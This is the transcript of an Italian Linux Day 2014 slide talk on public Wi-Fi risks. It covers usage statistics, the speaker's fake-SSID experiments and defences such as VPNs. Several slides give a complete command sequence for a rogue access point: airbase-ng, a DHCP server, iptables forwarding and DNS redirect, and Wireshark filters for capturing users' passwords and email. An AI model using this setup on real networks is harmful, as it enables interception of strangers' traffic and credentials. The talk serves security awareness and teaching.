BackBox: WiFi Libero? Ti spio!

download BackBox: WiFi Libero? Ti spio!

If you can't read please download the document

description

Al Linux Day 2014 di Imola ho parlato di Smartphone e Tablet che trainano le vendite del settore informatico degli ultimi anni, gli utenti inconsci della propria sicurezza si collegano incautamente a reti WiFi sconosciute mettendo a rischio le proprie informazioni personali. Una dimostrazione pratica permetterà di sensibilizzare l'utente medio e rivelerà ai più esperti come creare un finto Access Point con la distribuzione BackBox Linux.

Transcript of BackBox: WiFi Libero? Ti spio!

  • 1. BackBox: WiFi Libero? Ti spio!Andrea Draghetti - @AndreaDraghettiLinux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014

2. AgendaBackBox Linux Penetration Testing DistributionWiFi Libero? Ti spio! (Lo facciamo davvero....)Linux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 3. BackBox LinuxBackBox una distribuzione GNU/Linux derivata da Ubuntunata nel 2010 per volont di Raffaele Forte, progettata pereseguire Penetration Test e Security Assessment fornisceun insieme di strumenti che facilitano l'analisi di reti e sistemiinformatici. Essa integra in un ambiente desktop gli strumentinecessari ad un ethical hacker per eseguire test di sicurezza.Recentemente offre supporto anche per l'InformaticaForense e la Mobile Analysis!BackBox Open Source e Free!Linux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 4. BackBox ScreenLinux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 5. Top 100 DistroLinux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 6. BackBox LinkSito ufficiale: www.backbox.orgWiki: wiki.backbox.orgForum: forum.backbox.orgFacebook Group: www.facebook.com/groups/backboxMirror Garr: http://mirror3.mirror.garr.it/mirrors/backbox/Mirror OS: http://backbox.oversecurity.net/downloads/Repository: https://launchpad.net/~backboxLinux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 7. Un Caso RealeSempre pi connessi...Foto: XcelusLinux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 8. Smartphone nel MondoFonte: Il Sole 24 OreLinux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 9. Smartphone in ItaliaLinux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 10. WiFi finalmente liberoIl 23 Luglio 2013 stato definitivamente approvato lemendamento che liberalizzale reti WiFi in Italia.Linux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 11. Smartphone e WiFi ItalianoFonte: Cisco Febbraio '14Linux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 12. WiFi Libero e Utilizzo all'esteroEcco i principali risultati emersi dalla ricerca condotta negli UK: Il 31% del campione accede almeno una volta alla settimana a servizi Wi-Fipubblici per consultare dati aziendali confidenziali, e in media, gli intervistati sicollegano 15 volte a settimana a reti Wi-Fi aperte e poco sicure Il 52% dei pendolari teme che i propri dati possano essere intercettati duranteil collegamento a una rete Wi-Fi pubblica ma, ci nonostante, continuacomunque ad utilizzarla La met degli intervistati vive come una frustrazione lindisponibilit di retiWi-Fi, a dimostrazione di come gli utenti ormai percepiscano questo serviziocome indispensabile nella vita di tutti i giorni Il 20% dei dispositivi mobili non ha sistemi di sicurezza attivati, neppure unapassword o un codice PIN, e solo il 5% ha adottato policy di sicurezza corporateFonte: GFI SoftwareLinux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 13. WiFi Libero e Utilizzo ItalianoHo fatto una simulazione, con una Internet Key WiFi, alla StazioneTermini di Roma a Settembre 2013!SSID WiFi: Free WiFi TerminiUtenti collegati contemporaneamente: 7Utenti totali: ~16Durata Test: ~1hLinux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 14. WiFi Libero e Utilizzo ItalianoLinux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 15. Incauto CollegamentoRisultato:16 persone in circa un ora si sono collegate ad una rete WiFisconosciuta, attratte dal plausibile nome di rete!16utenti : 1h = Xutenti : 24hIn una giornata il mio Access Point poteva raggiungere 384utenti con un segnale che copre circa 7mt!Linux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 16. Eh ma nel 2014?!Il primo test l'ho contodotto un anno fa!Per essere sicuro l'ho ripetuto in un luogopubblico lo scorso 20 Ottobre nell'orariodi punta...Utenti collegati contemporaneamente: 5Linux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014Utenti totali: ~7Durata Test: ~7minuti7utenti : 7minuti = Xutenti : 60minuti60utenti/h 17. Ero tra voi...Il test l'ho condotto all'Istituto Tecnico Alberghetti alle 7:40 prima dell'ingresso nelle aule!SSID WiFi: Free WiFi AlberghettiLinux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 18. Ethical HackingSe le mie intenzioni non fossero state pacifiche?Cosa potevo ottenere dagli utenti collegati al WiFi?Sfruttando un Access Point pipotente/professionale?Linux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 19. Fake Access PointCreando un finto Access Point garantisco agli utenti dicollegarsi ad internet e senza che loro si accorgano di nullaposso intercettare/sniffare tutto il traffico che generano.Otterr:Cronologia di navigazione, eMail, Ricerche, Password, eccLinux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 20. DimostrazioneNon ci credete?Proviamo assieme!Occorrente: BackBox Linux Collegamento a Internet Adattatore WiFi USB Server DHCP Tanta volont... :)Linux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 21. Installiamo il DHCP Server$ sudo -s$ apt-get update && apt-get install dhcp3-server$ gedit /etc/dhcpd.conf# Sample /etc/dhcpd.conf# FakeAP by Andrea Draghettidefault-lease-time 600;max-lease-time 7200;option subnet-mask 255.255.255.0;option broadcast-address 192.168.0.255;option routers 192.168.0.1;option domain-name-servers 208.67.222.222; #OpenDNSsubnet 192.168.0.0 netmask 255.255.255.0 {range 192.168.0.10 192.168.0.100;Linux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014} 22. Prepariamo l'interfaccia di Rete$ sudo -s$ airmon-ng check kill$ ifconfig eth0 down$ ifconfig eth0 192.168.2.105 broadcast 255.255.255.0$ route add default gateway 192.168.2.1$ ifconfig eth0 upeth0 l'interfaccia di rete collegata ad internet.Linux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 23. Monitor Mode$ sudo -s$ airmon-ng start wlan0wlan0 lattuale interfaccia di rete wireless, se non conoscente la vostra interfacciadi rete wireless digitare il comando: iwconfigLinux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 24. Fake AP$ sudo -s$ airbase-ng --essid FakeAP -c 6 -v mon0mon0 interfaccia di rete creata nel passo precedente, ovvero con la funzione diMonitor Mode. Se non ricordate linterfaccia di rete creata digitare il comando: iwconfigLinux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 25. NetMask e Subnet(apriamo un nuovo terminale)$ sudo -s$ ifconfig at0 up$ ifconfig at0 192.168.0.1 netmask 255.255.255.0$ route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.0.1at0 interfaccia di rete creata nel passo precedente, ovvero con la funzione di Fake AP.Se non ricordate linterfaccia di rete creata digitare il comando: iwconfigLinux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 26. Start DHCP Server$ sudo -s$ touch /var/run/dhcpd.pid$ chmod 777 /var/run/dhcpd.pid$ dhcpd -d -f -cf /etc/dhcpd.conf at0at0 interfaccia di rete creata con la procedura di Fake AP. Se non ricordatelinterfaccia di rete creata digitare il comando: iwconfigLinux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 27. IP Tables(apriamo un nuovo terminale)$ sudo -s$ iptables --flush$ iptables --table nat --flush$ iptables --delete-chain$ iptables --table nat --delete-chain$ echo 1 > /proc/sys/net/ipv4/ip_forward$ iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE$ iptables --append FORWARD --in-interface at0 -j ACCEPT$ iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1eth0 linterfaccia di rete realmente collegata ad internetat0 linterfaccia del Fake AP192.168.1.1 il reale gateway, se non lo conoscete digitate il comando: route -nLinux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 28. WireShark$ sudo -s$ wiresharkVisionare l'interfaccia at0Filtri consigliati: tcp contains XXX Cerca la parola XXX in tutti i pacchetti TCP http.request Visualizza tutto il traffico GET e POST http Visualizza tutto il traffico HTTP sslLinux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 29. AneddotiFonte: Paolo AttivissimoLinux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 30. The FappeningUn incredibile storia di accesso abusivo ai profiliCloud di centinaia di star di Hollywood, econseguente pubblicazione online di Foto eVideo intimi scattate con i loro smartphone! Selena Gomez Jennifer Lawrence Melanie Laurent Lizzy Caplan Rihanna (in foto) Emily Browning Jenny McCarthy Avril Lavigne Jessica Alba Kaley Cuoco Lady Gaga Hillary Duff ...Linux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 31. Ipotesi: Fappening & Captive PortalLinux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014Attraverso un Captive Portal,necessario per accedere aduna rete WiFi in uno o pieventi cinematografici, hannoindotto i VIP a registrarsi.L'errato utilizzo dellamedesima password perpi servizi ha permesso agliattaccanti di accedere aiservizi Cloud delle vittime edi sottrare le Foto e Videointimi. 32. ContromisureLa prima regola DIFFIDATE, sfruttate la vostra offertaInternet!Ma a volte indispensabile collegarsi ad un Access Pointsconosciuto, possiamo proteggerci?Linux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 33. VPNUna Virtual Private Network permette di collegare in modo sicuro due estremi di unaconnessione tramite una rete non dedicata, tipicamente utilizzando internet. Si pu vedereuna VPN come l'estensione su scala geografica di una rete locale privata che collega traloro terminali dislocati su tutto il territorio sfruttando una rete IP pubblica e realizzando unarete LAN, detta appunto virtuale e privata, logicamente del tutto equivalente ad unainfrastruttura fisica di rete appositamente dedicata.Linux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 34. Server VPN? possibile crearsi un proprio Server VPN:Sfruttando DD-WRT, firmware Open Source per il vostro Router, se compatibile.Implementando pfSense, firewall/router software open sourcebasato su FreeBSD, configurabile su un comune computer.Linux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 35. Contromisura EstremaBlack Hole Data Bag isola ilproprio dispositivo da qualsiasisegnale 2G, 3G o 4G oltre aisegnali WiFi, Bluetooth e NFC!La vostra privacy assicurata!Fonte: D3LabLinux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014 36. Domande...?Linux Day 25 Ottobre 2014 Imola e Faenza Linux User Group#LinuxDay2014


Copia di WiFi Ozzano dell'Emilia · Copia di WiFi Ozzano dell'Emilia Reti WiFi disponibili: - EmiliaRomagnaWiFi (accesso libero senza registrazione) - wifi.italia.it (rete nazionale,

Copia di WiFi Ozzano dell'Emilia · Copia di WiFi Ozzano dell'Emilia Reti WiFi disponibili: - EmiliaRomagnaWiFi (accesso libero senza registrazione) - wifi.italia.it (rete nazionale,

MODULO WI-FI MODULE WI-FI WIFI-MODUL WIFI ... - HORNBACH

MODULO WI-FI MODULE WI-FI WIFI-MODUL WIFI ... - HORNBACH

AC750 WiFi Range Extender - downloads.netgear.com · 2 Per iniziare Il WiFi Range Extender di NETGEAR aumenta la distanza di una rete WiFi tramite il potenziamento del segnale WiFi

AC750 WiFi Range Extender - downloads.netgear.com · 2 Per iniziare Il WiFi Range Extender di NETGEAR aumenta la distanza di una rete WiFi tramite il potenziamento del segnale WiFi

Wifi Musei

Wifi Musei

Meru Depliant Wifi 4generazione

Meru Depliant Wifi 4generazione

Arduino wifi logger node

Arduino wifi logger node

MANUALE DI INSTALLAZIONE - dseitalia.it kit wifi serie RMK - Manuale... · DSE SRL – ITALY – Kit IP WiFi Plug & Play Telecamere IP e NVR WiFi Manuale di installazione Come installare

MANUALE DI INSTALLAZIONE - dseitalia.it kit wifi serie RMK - Manuale... · DSE SRL – ITALY – Kit IP WiFi Plug & Play Telecamere IP e NVR WiFi Manuale di installazione Come installare

manuale wifi fastweb

manuale wifi fastweb

KIT CONNESSIONE WiFi - Italtherm

KIT CONNESSIONE WiFi - Italtherm

WiFi Range Extender N600 - downloads.netgear.com

WiFi Range Extender N600 - downloads.netgear.com

Guida introduttiva a AC1900 Smart WiFi Router modello R6800€¦ · Aprire il programma di gestione delle connessioni WiFi sul computer o dispositivo WiFi, trovare l'SSID del router

Guida introduttiva a AC1900 Smart WiFi Router modello R6800€¦ · Aprire il programma di gestione delle connessioni WiFi sul computer o dispositivo WiFi, trovare l'SSID del router

PROTOCOLO MRTG USANDO WIFI EN LINUX

PROTOCOLO MRTG USANDO WIFI EN LINUX

Cassetta per pacchi postali WIFI IP

Cassetta per pacchi postali WIFI IP

Hotspot WiFi Placejam

Hotspot WiFi Placejam

Social wifi-800x600

Social wifi-800x600

Spio Kids - Dolce Attesa n°1

Spio Kids - Dolce Attesa n°1

Arduino Tutorial #15 - Robot WiFi · Arduino Tutorial #15 - Robot WiFi Materiale utilizzato – Arduino UNO - WiFi Shield - due motorini servo ... Prima di collegare Ardunio a internet

Arduino Tutorial #15 - Robot WiFi · Arduino Tutorial #15 - Robot WiFi Materiale utilizzato – Arduino UNO - WiFi Shield - due motorini servo ... Prima di collegare Ardunio a internet

Spio Kids - Volantone Ottobre 2013

Spio Kids - Volantone Ottobre 2013

Wifi per le scuole di Monza

Wifi per le scuole di Monza

Hotspot WiFi per Eventi - Noody WiFi

Hotspot WiFi per Eventi - Noody WiFi